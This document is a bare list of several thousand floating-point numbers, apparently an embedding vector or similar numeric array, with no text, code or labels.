-0.006458885036408901, 0.00023798045003786683, -0.006502525880932808, 0.02582099288702011, 0.025981010869145393, -0.003696765983477235, 0.0037204050458967686, -0.03156707435846329, -0.017180051654577255, -0.046375956386327744, -0.023391637951135635, 0.022140592336654663, 0.012539546936750412, 0.014176088385283947, 0.061854004859924316, -0.010408406145870686, -0.02491907589137554, 0.03837508708238602, -0.012219511903822422, -0.02499181218445301, 0.027901219204068184, -0.02088954672217369, 0.0187365859746933, -0.003778593149036169, -0.028090329840779305, -0.008386367931962013, 0.03168344870209694, 0.0021947843488305807, -0.017718292772769928, 0.004345927853137255, -0.008364547044038773, 0.0025257295928895473, 0.005273301154375076, -0.023464372381567955, 0.012765025720000267, -0.0006573442951776087, -0.0024038981646299362, 0.01163035724312067, -0.008451828733086586, -0.01208131480962038, 0.012197691947221756, 0.0125686414539814, -0.033254530280828476, -0.01866384968161583, -0.020787717774510384, 0.02224242128431797, 0.00882277823984623, 0.017107317224144936, -0.001161035499535501, 0.013783318921923637, 0.014423388056457043, -0.006171580869704485, -0.037735018879175186, 0.029181359335780144, 0.008968248963356018, -0.00848819687962532, -0.027799390256404877, -0.026766549795866013, -0.003727678442373872, 0.019522124901413918, 0.01626358926296234, -0.007208057213574648, -0.00596428569406271, -0.014503397047519684, -0.003278538817539811, -0.02164599299430847, -0.02198057435452938, 0.022329702973365784, -0.008604573085904121, -0.02352256141602993, -0.006582534871995449, 0.015710800886154175, 0.005887913517653942, 0.01828562654554844, -0.03235261142253876, -0.02273702062666416, -0.02340618520975113, 0.032498084008693695, -0.010226568207144737, 0.00041254490497522056, -0.014699782244861126, -0.00493144616484642, 0.007142595946788788, -0.0005214203847572207, 0.027333885431289673, 0.015419860370457172, 0.0074626305140554905, -0.020118553191423416, -0.010808449238538742, 0.011564895510673523, 0.002903952496126294, 0.013106881640851498, 0.01584172435104847, -0.022067856043577194, -0.012735932134091854, 0.04218640923500061, 0.008895513601601124, 0.007746297866106033, 0.025602787733078003, -0.009397386573255062, -0.007440810091793537, -0.027901219204068184, -0.0028639482334256172, -0.010466594249010086, 0.02641742117702961, -0.0014356108149513602, -0.015623519197106361, 0.011063022539019585, -0.002989416243508458, 0.011281227692961693, -0.002936683362349868, -0.0021293226163834333, -0.00848819687962532, 0.03857874497771263, -0.03668763116002083, -0.022416986525058746, -0.012357708998024464, -0.002853037789463997, 0.02867221273481846, -0.011033928021788597, -0.02909407578408718, 0.010808449238538742, 0.00493871932849288, 0.0053642201237380505, -0.043001044541597366, -0.0029839612543582916, -0.006858928594738245, -0.0043168338015675545, -0.0036185758654028177, -0.018111063167452812, -0.012415897101163864, 0.011266681365668774, 0.0017192780505865812, 0.016889112070202827, -0.01633632369339466, 0.022271515801548958, 0.018489286303520203, -0.0042295511811971664, -0.033021777868270874, 0.008735496550798416, 0.02404625341296196, -0.013877874240279198, -0.006502525880932808, 0.012503179721534252, -0.049430835992097855, 0.01155034825205803, -0.0023184341844171286, 0.003971341531723738, 0.005487869959324598, 0.001303778262808919, -0.010983013547956944, 0.006924390327185392, 0.02310069650411606, 0.0030094184912741184, 0.024788152426481247, 0.008539111353456974, 0.007986323907971382, -0.0133396340534091, -0.004876894410699606, -0.027202961966395378, 0.023435277864336967, -0.0038695121183991432, -0.029705051332712173, 0.00602247379720211, -0.02160235121846199, -0.008357273414731026, -0.019813066348433495, 0.0018029235070571303, -0.036978572607040405, 0.0070153092965483665, 0.014939808286726475, -0.004884168040007353, 0.01413244754076004, 0.014387020841240883, 0.00784812681376934, -0.02152961678802967, 0.012837761081755161, -0.008022691123187542, 0.02250426821410656, -0.0016301774885505438, -0.013739677146077156, 0.04317560791969299, 0.020191289484500885, -0.021500522270798683, -0.020642247051000595, 0.019289372488856316, -0.012765025720000267, 0.004811432678252459, -0.01949303038418293, 0.005527874454855919, -0.0010501142824068666, -0.012481358833611012, -0.0024420840200036764, -0.011048475280404091, 0.025079093873500824, -0.021776916459202766, -0.003594936802983284, 0.0015201654750853777, -0.02867221273481846, -0.01544895488768816, 0.009710147976875305, -0.007455356884747744, 0.02446811832487583, -0.01484525203704834, 0.008080880157649517, 0.006975304801017046, -0.043670207262039185, 0.016583623364567757, -0.03360365703701973, -0.012677744030952454, 0.015754442662000656, 0.0202785711735487, -0.0018156522419303656, -0.04241916164755821, -0.008095426484942436, 0.034941986203193665, 0.05056550353765488, 0.027333885431289673, -0.012590461410582066, -0.029908711090683937, 0.01892569661140442, -0.008699128404259682, -0.031625259667634964, 0.005124194081872702, -0.015274389646947384, -0.003482197178527713, -0.030985191464424133, 0.05376585200428963, 0.0031312499195337296, -0.009390112943947315, 0.0004964176914654672, 0.024337194859981537, -0.0025384582113474607, 0.002100228564813733, -0.03872421383857727, -0.00245481263846159, -0.04061533138155937, -0.008670034818351269, 0.037880487740039825, -0.00020309029787313193, 0.07331707328557968, -0.016118118539452553, -0.00882277823984623, 0.0035076546482741833, 0.0035222016740590334, 0.0029548672027885914, -0.007629921659827232, -0.030606968328356743, 0.015681706368923187, -0.008415461517870426, 0.02366803027689457, 0.0031930748373270035, -0.007826306857168674, 0.003482197178527713, -0.0006005199393257499, 0.01678728125989437, -0.017398256808519363, -0.02630104497075081, 0.008590025827288628, -0.004375021904706955, -0.0258500874042511, 0.0034094620496034622, 0.01982761360704899, 0.03692038357257843, 0.016990941017866135, -0.019434843212366104, 0.03753135725855827, 0.010502961464226246, -0.005404224619269371, 0.003202166873961687, -0.01626358926296234, -0.026635626330971718, -0.03898606076836586, -0.013005051761865616, -0.033138152211904526, -0.0001588809391250834, 0.005866093095391989, -0.025981010869145393, -0.022402439266443253, -0.005800631362944841, 0.04023710638284683, 0.01569625362753868, 0.01552168931812048, -0.029632316902279854, -0.02148597501218319, 0.002031130250543356, -0.005986106116324663, -0.013652395457029343, -0.015739895403385162, -0.037385888397693634, -0.02020583674311638, 0.0033076328691095114, -0.0021856925450265408, 0.03706585243344307, 0.02999599277973175, 0.00046641440712846816, 0.044048432260751724, 0.003956794273108244, -0.02152961678802967, -0.016161760315299034, 0.0038986061699688435, 0.005196929443627596, -0.03523292765021324, 0.013172343373298645, -0.007993597537279129, -0.0015892639057710767, -0.04110993072390556, 0.006404333747923374, -0.00015058457211125642, 0.0025657338555902243, -0.023580748587846756, -0.02404625341296196, 0.015463501214981079, 0.020336760208010674, -0.014154268428683281, 0.03014146350324154, 0.03424372896552086, 0.013143248856067657, -0.02558824047446251, -0.008226349949836731, -0.026999302208423615, -0.039829790592193604, -0.0507400706410408, 0.020904093980789185, -0.027086585760116577, -0.025340940803289413, 0.006848018150776625, 0.015943553298711777, 0.0011064840946346521, 0.0077826655469834805, -0.003913153428584337, -0.008531837724149227, -0.0017729202518239617, 0.012786846607923508, -0.014888893812894821, -0.01539076678454876, -0.03630940616130829, -0.02043858915567398, 0.014816158451139927, -0.002680291887372732, 0.028352176770567894, -0.01716550439596176, 0.030025087296962738, -0.028803136199712753, 0.01923118531703949, 0.006938937120139599, 0.03424372896552086, 0.0015028908383101225, 0.009870165027678013, -0.004295012913644314, 0.018154703080654144, 0.016583623364567757, -0.01911480911076069, -0.011448519304394722, 0.013805138878524303, 0.003709494834765792, -0.021020470187067986, 0.009659233503043652, -0.020831359550356865, -0.010452046990394592, 0.01854747347533703, 0.04355383291840553, 0.01942029595375061, -0.023653484880924225, -0.03145069628953934, -0.015536236576735973, -0.009295557625591755, 0.010786629281938076, 0.01569625362753868, 0.003556750947609544, 0.0060515678487718105, 0.008924608118832111, 0.013892421498894691, 0.026431968435645103, -0.0010119283106178045, -0.007717203814536333, -0.0018065603217110038, -0.005142378155142069, -0.020191289484500885, 0.010444773361086845, -0.005531511269509792, -0.027072038501501083, -0.03473832830786705, 0.0057278964668512344, -0.03232352063059807, -0.033021777868270874, -0.020293118432164192, -0.006684363819658756, 0.016539981588721275, -0.01603083685040474, 0.000016123914974741638, 0.006400696933269501, 0.03424372896552086, -0.009731968864798546, 0.0022366070188581944, 0.013441463001072407, 0.007600827608257532, 0.009491942822933197, 0.009630138985812664, -0.0261992160230875, -0.018954791128635406, -0.0043822950683534145, -0.014896167442202568, -0.0202785711735487, 0.034534670412540436, -0.023682577535510063, -0.0038695121183991432, -0.013826959766447544, -0.008662761189043522, 0.010284756310284138, 0.015099825337529182, -0.025079093873500824, -0.02224242128431797, 0.016249042004346848, -0.002927591325715184, -0.017980139702558517, -0.010306576266884804, 0.011223039589822292, 0.04399024322628975, 0.02321707271039486, -0.040324389934539795, -0.006146123632788658, -0.006226132158190012, 0.02397351898252964, 0.01949303038418293, 0.009928353130817413, 0.0013201436959207058, 0.020104005932807922, 0.020365852862596512, 0.0034003702457994223, -0.0005414225743152201, -0.003033057553693652, 0.009761062450706959, 0.0014465211424976587, -0.013856054283678532, -0.031596165150403976, 0.021442335098981857, 0.011121210642158985, 0.01588536612689495, 0.0068734753876924515, 0.005487869959324598, -0.016903657466173172, 0.019696690142154694, 0.005233297124505043, -0.023537108674645424, -0.024293553084135056, -0.0012601371854543686, 0.006986215244978666, -0.03284721076488495, -0.009826524183154106, 0.006397060118615627, 0.012975958175957203, 0.013819686137139797, -0.002062042709439993, 0.02344982512295246, -0.000047561996325384825, -0.008437282405793667, -0.025617334991693497, -0.0017874672776088119, -0.00814634095877409, -0.03127613291144371, 0.011070296168327332, -0.0013928789412602782, -0.029603222385048866, 0.032992683351039886, -0.004855073988437653, -0.014910713769495487, 0.006895296275615692, 0.003804050385951996, -0.03014146350324154, 0.04643414542078972, -0.0007409897516481578, -0.0125686414539814, 0.0050223651342093945, -0.011492160148918629, -0.004225914366543293, 0.012954137288033962, -0.023362543433904648, -0.0021820557303726673, 0.0009910169756039977, 0.0006259772344492376, 0.01994398981332779, -0.00493871932849288, -0.04602682963013649, -0.004207730758935213, 0.01892569661140442, 0.007182599976658821, 0.032381705939769745, -0.010212020948529243, 0.00936829298734665, -0.026970209553837776, 0.006440700963139534, 0.0021111390087753534, 0.0405571423470974, -0.02129686437547207, 0.01629268191754818, 0.0021275044418871403, -0.003158525563776493, -0.0042731924913823605, 0.01847473904490471, 0.011557621881365776, 0.016001742333173752, -0.011099389754235744, 0.017732840031385422, -0.012823213823139668, 0.017441898584365845, -0.026635626330971718, -0.02046768181025982, -0.004153179470449686, 0.0005396042251959443, 0.02634468674659729, 0.0063825128600001335, 0.014823432080447674, 0.03354547172784805, 0.014568858779966831, -0.006582534871995449, -0.016990941017866135, -0.01324507873505354, 0.008349999785423279, -0.011935845017433167, 0.04358292743563652, 0.006749825552105904, -0.008895513601601124, 0.0044441199861466885, -0.0037349520716816187, 0.001344691845588386, 0.0029094077181071043, -0.00008517973037669435, -0.04026620090007782, -0.040440768003463745, 0.02103501744568348, -0.01172491256147623, -0.027610277757048607, -0.006575261242687702, 0.0141688147559762, 0.00029412293224595487, 0.002260246081277728, -0.032759930938482285, -0.019900348037481308, -0.008313632570207119, 0.016918204724788666, -0.018809320405125618, -0.00096555968048051, 0.008597299456596375, 0.02408989518880844, 0.016190852969884872, 0.026359234005212784, 0.050070904195308685, 0.02675200253725052, 0.011841288767755032, 0.0068625654093921185, -0.018169250339269638, 0.03360365703701973, -0.02646106295287609, 0.022446079179644585, -0.0010755716357380152, 0.010772082023322582, -0.001563806552439928, 0.010757534764707088, 0.03127613291144371, 0.028584929183125496, 0.02430810034275055, 0.012074042111635208, -0.028744947165250778, 0.019405748695135117, -0.015027090907096863, 0.02246062643826008, -0.005142378155142069, -0.02615557424724102, 0.01552168931812048, 0.020045818760991096, 0.02919590473175049, -0.004404115956276655, 0.02878858894109726, 0.024293553084135056, -0.015259843319654465, 0.008895513601601124, -0.004124085418879986, 0.0017556456150487065, 0.011106663383543491, 0.0012355890357866883, -0.02627195045351982, 0.014401568099856377, 0.03241080045700073, -0.006240679416805506, -0.055191464722156525, -0.011521254666149616, -0.008953701704740524, 0.002889405470341444, 0.006295230705291033, 0.004313196986913681, 0.022038763388991356, 0.01953667216002941, 0.00006551849946845323, -0.0032621733844280243, 0.002607556525617838, 0.029821427538990974, -0.011834015138447285, 0.0012819577241316438, 0.009237369522452354, 0.028177613392472267, 0.017980139702558517, 0.025006359443068504, -0.0218205563724041, 0.026126479730010033, 0.013914242386817932, -0.03165435418486595, 0.0023511650506407022, 0.004575043451040983, 0.03305087238550186, -0.02032221294939518, -0.02013310045003891, -0.01539076678454876, -0.026475610211491585, -0.00769538339227438, -0.0063825128600001335, -0.0049787238240242004, 0.013790592551231384, -0.008313632570207119, 0.0031385235488414764, -0.0024202633649110794, 0.02013310045003891, 0.006706184707581997, -0.043117422610521317, -0.0017674651462584734, 0.02698475494980812, -0.010830270126461983, 0.004902351647615433, -0.01565261371433735, -0.0003225351101718843, 0.003716768231242895, -0.003854965092614293, 0.011746733449399471, 0.007051676977425814, 0.022489720955491066, -0.03363275155425072, -0.004549586214125156, 0.019172996282577515, -0.018198344856500626, 0.01828562654554844, 0.01693275198340416, 0.00776084465906024, -0.016438152641057968, 0.007855400443077087, 0.022373344749212265, -0.019172996282577515, -0.023347996175289154, -0.013950609602034092, -0.0057933577336370945, -0.01828562654554844, 0.009986542165279388, 0.01163035724312067, -0.02152961678802967, -0.012597735039889812, -0.0028257621452212334, -0.00878641102463007, 0.005411498248577118, -0.010328397154808044, 0.012372256256639957, 0.009179181419312954, -0.018722038716077805, -0.0001371740218019113, -0.011906750500202179, -0.00029571400955319405, -0.006731641944497824, 0.017485540360212326, -0.00946284830570221, 0.01552168931812048, -0.01825653202831745, -0.02446811832487583, 0.00813179463148117, 0.0075790067203342915, -0.013405095785856247, 0.034156445413827896, 0.0038222342263907194, -0.01091027818620205, 0.014343379996716976, -0.004360474646091461, -0.0045314026065170765, -0.013092334382236004, -0.011048475280404091, 0.00424409843981266, -0.006960757542401552, 0.022227874025702477, 0.004738697782158852, 0.0031457969453185797, 0.008611846715211868, 0.013899695128202438, 0.017369164153933525, 0.008095426484942436, 0.02857038378715515, -0.020947735756635666, -0.017180051654577255, 0.01878022588789463, 0.018794773146510124, -0.02347891964018345, -0.007797212339937687, 0.012030400335788727, -0.030228745192289352, 0.03630940616130829, -0.00017024581029545516, -0.005295122042298317, 0.010822996497154236, -0.016394512727856636, -0.03729860484600067, 0.013208710588514805, -0.012103135697543621, -0.0009955628775060177, 0.019769424572587013, -0.012423170730471611, -0.010481140576303005, -0.006200674921274185, 0.010212020948529243, -0.012932317331433296, -0.021456880494952202, 0.031334321945905685, 0.006749825552105904, -0.004975087009370327, 0.019507577642798424, 0.02574825845658779, 0.030083274468779564, 0.009673780761659145, -0.015739895403385162, 0.021122299134731293, -0.012554094195365906, 0.016321776434779167, 0.005786084569990635, -0.012212238274514675, 0.006848018150776625, -0.021704180166125298, -0.01507073175162077, -0.01915844902396202, 0.013470557518303394, -0.003993161953985691, -0.01324507873505354, -0.024584494531154633, -0.011397604830563068, -0.010182926431298256, 0.029908711090683937, 0.02321707271039486, -0.04564860463142395, -0.026621079072356224, -0.0036731271538883448, 0.012575914151966572, 0.0141106266528368, -0.0015892639057710767, -0.02046768181025982, -0.031072473153471947, 0.02243153378367424, 0.0008610028307884932, 0.028759494423866272, -0.027348432689905167, -0.0023657120764255524, -0.019172996282577515, 0.0058915503323078156, 0.02404625341296196, 0.013623300939798355, -0.01483070570975542, -0.04131358861923218, 0.04169180989265442, -0.01870749145746231, 0.00388042232953012, -0.007477177772670984, 0.008117247372865677, -0.00027139318990521133, 0.019653048366308212, 0.011644904501736164, 0.004505944903939962, -0.011710365302860737, -0.013172343373298645, 0.011914024129509926, 0.02510818839073181, 0.0030076000839471817, 0.01272138487547636, 0.00957922451198101, 0.012001306749880314, 0.006262499839067459, -0.008291811682283878, -0.010473867878317833, 0.01454703789204359, -0.004142269026488066, 0.0013592388713732362, 0.005327852908521891, 0.021238675341010094, -0.020758623257279396, 0.0010073824087157845, -0.026621079072356224, -0.008575478568673134, -0.032236237078905106, 0.014045164920389652, 0.021282317116856575, -0.024075347930192947, -0.01591446064412594, 0.005476959981024265, 0.02919590473175049, -0.01240134984254837, -0.016947299242019653, 0.04785975441336632, -0.004004072397947311, -0.01337600126862526, -0.012852308340370655, -0.012321341782808304, -0.058770034462213516, -0.002500272123143077, -0.0044259363785386086, -0.02081681229174137, 0.012437717989087105, -0.03465104475617409, -0.010037456639111042, 0.010881184600293636, -0.010015635751187801, 0.014350653626024723, 0.0015119827585294843, 0.021427787840366364, 0.011026655323803425, 0.014823432080447674, -0.019594861194491386, 0.0024820882827043533, 0.028686759993433952, 0.002269337885081768, -0.014779791235923767, 0.015827177092432976, 0.013288719579577446, 0.008720949292182922, -0.011375783942639828, -0.002132959431037307, 0.031974390149116516, 0.007768118288367987, 0.002367530483752489, -0.019667595624923706, 0.02615557424724102, -0.006037021055817604, -0.03639668971300125, -0.0013365091290324926, -0.01309960801154375, 0.016045382246375084, -0.0008378184866160154, 0.012052221223711967, -0.008953701704740524, 0.018314721062779427, -0.01387060061097145, -0.018489286303520203, 0.015463501214981079, -0.022533362731337547, -0.00005588676503975876, -0.004458667244762182, 0.005593336187303066, 0.024977264925837517, 0.009593771770596504, 0.008175435476005077, 0.03470923379063606, 0.010073823854327202, 0.011681271716952324, -0.00461141113191843, -0.00462959473952651, 0.007862674072384834, -0.005986106116324663, -0.001671090954914689, 0.018241986632347107, -0.007862674072384834, 0.011593989096581936, 0.007284429389983416, -0.0020184016320854425, -0.01166672445833683, -0.025122735649347305, -0.014888893812894821, -0.010866637341678143, -0.002874858444556594, 0.029603222385048866, 0.008313632570207119, -0.0007137140491977334, 0.01806742139160633, 0.002943956758826971, -0.015041637234389782, 0.023609843105077744, -0.009528310038149357, -0.003396733431145549, -0.0025548236444592476, 0.0133978221565485, 0.007073497399687767, 0.022300610318779945, -0.0003186710528098047, -0.006400696933269501, 0.012888675555586815, 0.002911226125434041, -0.002505727345123887, -0.0011874019401147962, -0.011128484271466732, 0.017092769965529442, -0.016321776434779167, -0.001823834958486259, -0.01859111525118351, 0.010721167549490929, 0.01859111525118351, -0.02032221294939518, -0.019798519089818, 0.013899695128202438, 0.0009610137203708291, -0.010124738328158855, 0.018722038716077805, 0.0023966245353221893, -0.01633632369339466, -0.015201655216515064, 0.0025111825671046972, 0.01192857138812542, 0.024846341460943222, -0.005709712393581867, -0.0013892421266064048, -0.0056769815273582935, -0.0028112151194363832, 0.0015192562714219093, -0.006484342273324728, 0.0075062718242406845, 0.024075347930192947, -0.007906314916908741, 0.02024947665631771, 0.0195657666772604, -0.0026002831291407347, -0.0011701274197548628, -0.013732404448091984, 0.017252787947654724, -0.03593118488788605, 0.017936497926712036, 0.0013437826419249177, -0.00704804016277194, 0.01610357128083706, 0.002389351138845086, -0.013470557518303394, -0.0057278964668512344, -0.010226568207144737, -0.03127613291144371, 0.01937665417790413, 0.00024093531828839332, 0.014677961356937885, -0.0011710366234183311, 0.01063388492912054, -0.017776479944586754, -0.013506924733519554, 0.01636541821062565, 0.015638066455721855, 0.012903222814202309, -0.04076080024242401, -0.005829725414514542, 0.007211694028228521, 0.026097387075424194, 0.011754007078707218, -0.026126479730010033, -0.031101567670702934, 0.015259843319654465, -0.013005051761865616, -0.0126850176602602, -0.022707926109433174, 0.01087391097098589, 0.0004455030430108309, 0.011033928021788597, -0.008124521002173424, 0.006789830047637224, -0.022446079179644585, 0.017092769965529442, 0.003711313009262085, 0.00004222050483804196, 0.0048623476177453995, -0.0022438806481659412, -0.015492595732212067, -0.012830487452447414, -0.02129686437547207, -0.02973414584994316, 0.010059276595711708, -0.0007528092246502638, -0.00816816184669733, -0.010248388163745403, -0.009695600718259811, 0.004545949399471283, 0.03063606284558773, -0.002520274370908737, 0.019842160865664482, -0.010110192000865936, 0.0031076110899448395, -0.0018129246309399605, -0.0051932926289737225, 0.017587369307875633, 0.009550130926072598, 0.00014046984142623842, 0.019333014264702797, 0.0013656031806021929, 0.008800958283245564, 0.005847909487783909, -0.02976324036717415, -0.005884277168661356, -0.013368727639317513, 0.011186672374606133, 0.013994250446557999, 0.02302796207368374, -0.0027312063612043858, -0.02713022567331791, -0.01021929457783699, -0.011332143098115921, -0.0021038653794676065, 0.014481576159596443, 0.001752008916810155, 0.0002988961641676724, -0.015419860370457172, 0.001296504749916494, -0.005604246631264687, 0.010684799402952194, -0.02419172413647175, -0.013114155270159245, 0.002911226125434041, 0.005273301154375076, 0.017398256808519363, -0.010284756310284138, -0.012590461410582066, -0.01742735132575035, -0.020307665690779686, -0.028366724029183388, -0.018460191786289215, 0.022533362731337547, 0.007273518946021795, 0.010582970455288887, 0.008400914259254932, -0.0057388064451515675, -0.00703712971881032, -0.005600609816610813, -0.005204203072935343, 0.03741498291492462, 0.008335452526807785, -0.0010928462725132704, -0.024264460429549217, 0.01738371141254902, 0.00036867649760097265, 0.0017692835535854101, -0.003571297973394394, -0.009535583667457104, 0.012263152748346329, 0.005571515765041113, 0.006255226209759712, 0.01298323180526495, -0.014721602201461792, -0.001318325288593769, 0.007586280349642038, 0.0060515678487718105, 0.014277918264269829, -0.006626175716519356, 0.005949738435447216, -0.004145905841141939, -0.01987125352025032, 0.007571733556687832, 0.030083274468779564, 0.020802265033125877, 0.007444446906447411, 0.030316026881337166, 0.004145905841141939, 0.0029785060323774815, -0.0043822950683534145, -0.004473214037716389, -0.0022511540446430445, -0.011019381694495678, -0.02307160198688507, -0.012030400335788727, -0.002767574042081833, -0.0020129464101046324, 0.01780557446181774, -0.013317813165485859, -0.001902025192975998, 0.016583623364567757, -0.01828562654554844, 0.006775283254683018, 0.007306249812245369, 0.01878022588789463, 0.007022582460194826, -0.0060952091589570045, 0.005160561762750149, 0.0028875870630145073, -0.020351305603981018, 0.0009482850437052548, -0.013390548527240753, -0.012590461410582066, -0.003125794930383563, 0.023697124794125557, -0.0038876959588378668, 0.01377604529261589, 0.003800413804128766, -0.0003113975399173796, 0.0013928789412602782, 0.0016292682848870754, 0.005309668835252523, 0.0019456663867458701, 0.027799390256404877, 0.005106010474264622, 0.019522124901413918, 0.006451611407101154, 0.0019511214923113585, -0.026824738830327988, -0.0007382621988654137, 0.003402188653126359, 0.0021584169007837772, 0.005098736844956875, 0.01518710795789957, 0.009797430597245693, -0.010015635751187801, -0.00529875885695219, -0.02475905977189541, -0.0029948714654892683, -0.011935845017433167, -0.01994398981332779, 0.00010779582953546196, 0.004640505183488131, -0.013943335972726345, 0.018503831699490547, -0.010510235093533993, 0.013921515084803104, -0.0015919915167614818, -0.013332360424101353, -0.04308832809329033, -0.010081097483634949, 0.002698475494980812, -0.003916790243238211, -0.004982360638678074, -0.02302796207368374, 0.015318031422793865, 0.005807904992252588, 0.02841036580502987, -0.00493144616484642, 0.01475069671869278, 0.006797103676944971, 0.015085279010236263, -0.004065897315740585, -0.020045818760991096, 0.0022929769475013018, -0.035582054406404495, 0.012975958175957203, -0.01915844902396202, -0.01915844902396202, 0.0253700353205204, -0.01010291837155819, -0.011972212232649326, 0.00016945027164183557, -0.000839182292111218, 0.003053059568628669, 0.007309886626899242, -0.016234494745731354, -0.011681271716952324, 0.001482888706959784, 0.02006036601960659, -0.005186018999665976, -0.023580748587846756, -0.021835103631019592, -0.0013310540234670043, 0.03226533159613609, 0.009666507132351398, 0.04259372875094414, -0.015827177092432976, -0.00002621024032123387, -0.0010801175376400352, -0.0031621623784303665, -0.017543727532029152, -0.030606968328356743, -0.002316615777090192, 0.02641742117702961, 0.0436411127448082, -0.007477177772670984, -0.005531511269509792, -0.001115576014854014, -0.0028166703414171934, -0.02148597501218319, 0.014030618593096733, -0.0009055531118065119, 0.03307996317744255, -0.01475069671869278, 0.015434407629072666, -0.016627265140414238, 0.02280975505709648, -0.015303484164178371, 0.006498889531940222, -0.0013292356161400676, -0.017601916566491127, 0.013572386465966702, -0.0009637412731535733, -0.0019274825463071465, 0.019129354506731033, 0.010822996497154236, 0.0029221363365650177, 0.009528310038149357, 0.008080880157649517, -0.00016342688468284905, -0.007168053183704615, -0.01552168931812048, -0.028497647494077682, -0.012554094195365906, 0.019594861194491386, 0.03898606076836586, 0.011070296168327332, -0.00814634095877409, -0.013536019250750542, 0.002756663830950856, -0.0038440548814833164, -0.0010519326897338033, -0.014685234986245632, -0.01095391996204853, -0.0037222234532237053, 0.008510017767548561, -0.010299302637577057, 0.009448301047086716, 0.00594610208645463, 0.012932317331433296, 0.0009991996921598911, 0.0033785495907068253, -0.009040984325110912, 0.012103135697543621, -0.007804485969245434, -0.01365966908633709, 0.007400805596262217, 0.0009278282523155212, 0.006866202224045992, -0.004022256005555391, -0.009957447648048401, -0.0021147755905985832, -0.005855182651430368, 0.014372473582625389, -0.010881184600293636, -0.001628359081223607, 0.02755209058523178, -0.001020111027173698, 0.006695274263620377, -0.0010755716357380152, 0.027464808896183968, 0.01125213410705328, 0.014146994799375534, -0.04832525923848152, 0.0038731489330530167, -0.025486411526799202, -0.012859581969678402, 0.01629268191754818, -0.007877221331000328, -0.009273736737668514, -0.001480161095969379, 0.03799686208367348, -0.00597519613802433, -0.011266681365668774, -0.019405748695135117, 0.03721132501959801, 0.012321341782808304, -0.008706402033567429, 0.004778702277690172, 0.006120666395872831, -0.007182599976658821, 0.010073823854327202, -0.016569076105952263, -0.016452699899673462, 0.0054624127224087715, 0.008568205870687962, -0.0004252735816407949, 0.0011283046333119273, -0.013201436959207058, -0.018983885645866394, -0.029777787625789642, 0.004796885885298252, 0.01053932961076498, -0.0002686656080186367, -0.001647452125325799, 0.015099825337529182, 0.008982796221971512, -0.013114155270159245, -0.00776084465906024, 0.015274389646947384, -0.008946428075432777, -0.006655269768089056, -0.012634102255105972, 0.006247953046113253, -0.00981925055384636, -0.0038949695881456137, 0.02020583674311638, 0.0002177509741159156, 0.0013856054283678532, 0.0039967987686395645, -0.007455356884747744, 0.011579442769289017, 0.009135539643466473, 0.027261149138212204, 0.012939590029418468, 0.00038845138624310493, -0.010808449238538742, -0.007797212339937687, -0.0036385778803378344, -0.017703745514154434, -0.005378767382353544, -0.008029964752495289, 0.004945992957800627, -0.010939372703433037, -0.011201219633221626, 0.006724368315190077, 0.005582425743341446, -0.011775827035307884, 0.006582534871995449, -0.026999302208423615, -0.00910644605755806, 0.0010983013780787587, 0.0008505471632815897, 0.012997779063880444, -0.008357273414731026, 0.008037238381803036, -0.01236498262733221, -0.008044512011110783, -0.016583623364567757, -0.009775609709322453, 0.0134560102596879, -0.0011764917289838195, -0.009957447648048401, -0.02686837874352932, 0.013906968757510185, -0.013179617002606392, 0.029966898262500763, 0.010466594249010086, 0.007862674072384834, -0.008757317438721657, 0.0027712108567357063, -0.008720949292182922, 0.018532926216721535, -0.008037238381803036, -0.02641742117702961, 0.0014928898308426142, 0.016845470294356346, 0.015158013440668583, 0.013521471992135048, -0.003020328702405095, 0.003920426592230797, -0.006411606911569834, 0.011863109655678272, -0.003738588886335492, 0.003804050385951996, 0.007273518946021795, 0.019071167334914207, 0.032992683351039886, -0.010532055981457233, -0.023187978193163872, -0.015361672267317772, 0.016627265140414238, 0.00948466919362545, 0.02046768181025982, -0.01202312670648098, 0.010393858887255192, 0.003804050385951996, -0.010713893920183182, -0.013012325391173363, 0.009244643151760101, 0.007993597537279129, -0.00032435348839499056, -0.020307665690779686, -0.009651959873735905, -0.00006375693919835612, 0.008291811682283878, 0.016918204724788666, -0.036716725677251816, -0.0006255226326175034, 0.03203257918357849, 0.012270426377654076, -0.018154703080654144, 0.0058806403540074825, -0.0042295511811971664, 0.00036754002212546766, 0.0049787238240242004, -0.004305923357605934, -0.021005922928452492, -0.011652177199721336, 0.006386149674654007, 0.0044877612963318825, 0.005200566258281469, -0.0011219403240829706, 0.00709531782194972, -0.004029529634863138, -0.018867509439587593, 0.009251915849745274, -0.011150305159389973, 0.003927700221538544, -0.018009232357144356, -0.011208493262529373, 0.0374731719493866, -0.03526202216744423, -0.019318467006087303, -0.034825608134269714, 0.010939372703433037, 0.028497647494077682, -0.0023129789624363184, -0.004364111460745335, -0.029966898262500763, -0.009637412615120411, -0.02404625341296196, 0.010830270126461983, 0.012735932134091854, -0.009891985915601254, -0.01477251760661602, -0.014379747211933136, 0.011957664974033833, 0.01552168931812048, -0.006498889531940222, 0.0006191583233885467, 0.0329635888338089, -0.008604573085904121, -0.03758954629302025, 0.008990069851279259, -0.0212241280823946, -0.00461141113191843, 0.006047931034117937, 0.0043277437798678875, -0.010742987506091595, -0.00814634095877409, 0.021093204617500305, -0.026402873918414116, -0.013543292880058289, -0.009833797812461853, 0.021020470187067986, 0.0011564894812181592, 0.02555914595723152, -0.0033058144617825747, 0.02273702062666416, -0.016118118539452553, 0.011848562397062778, -0.006600718479603529, -0.014205182902514935, -0.011317595839500427, -0.018431097269058228, 0.008931881748139858, -0.000915554235689342, -0.004280466120690107, 0.011179398745298386, 0.019783971831202507, -0.014008797705173492, -0.0029094077181071043, -0.0038840591441839933, 0.0031367051415145397, -0.01565261371433735, 0.010124738328158855, 0.03718223050236702, -0.014699782244861126, -0.005789721384644508, 0.0007896313909441233, -0.009230095893144608, -0.0031567073892802, -0.013346907682716846, -0.018227439373731613, 0.007368074730038643, -0.011673998087644577, -0.02912317030131817, 0.0013165069976821542, 0.010379311628639698, -0.000689165957737714, -0.014437935315072536, -0.011579442769289017, 0.006346145179122686, 0.002776665845885873, -0.010379311628639698, 0.004516855347901583, 0.004607774317264557, 0.009382839314639568, -0.0008178162970580161, 0.01806742139160633, 0.006888022646307945, -0.006524346768856049, -0.009746515192091465, -0.011186672374606133, -0.011077569797635078, 0.021136846393346786, -0.0006473431712947786, -0.007437173277139664, -0.014503397047519684, -0.015929006040096283, -0.014408841729164124, 0.0005709712277166545, 0.01768919825553894, 0.014685234986245632, -0.02404625341296196, -0.006186128128319979, -0.002665744861587882, 0.011506707407534122, 0.007135322317481041, -0.020336760208010674, 